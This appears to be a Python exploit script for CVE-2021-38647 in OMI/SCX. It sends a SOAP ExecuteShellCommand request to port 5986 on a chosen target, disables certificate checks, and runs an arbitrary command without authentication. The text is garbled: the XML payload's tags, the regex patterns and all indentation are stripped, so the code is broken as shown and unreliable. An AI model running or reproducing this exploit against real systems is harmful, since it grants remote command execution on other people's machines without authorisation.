#!/usr/bin/python3
import argparse
import re
import requests
import urllib3
from xml.etree import ElementTree
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# SOAP payload from https://github.com/midoxnet/CVE-2021-38647
DATA = """
HTTP://192.168.1.1:5986/wsman/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand
102400
uuid:0AB58087-C2C3-0005-0000-000000010000
PT1M30S
root/scx
{}
0
"""
def exploit(target, command):
headers = {'Content-Type': 'application/soap+xml;charset=UTF-8'}
r = requests.post(f'https://{target}:5986/wsman', headers=headers, data=DATA.format(command), verify=False)
output = re.search('(.*)', r.text)
error = re.search('(.*)', r.text)
if output:
if output.group(1):
print(output.group(1).rstrip('
'))
if error:
if error.group(1):
print(error.group(1).rstrip('
'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
parser.add_argument('-c', '--command', help='The command to run')
args = parser.parse_args()
exploit(args.target, args.command)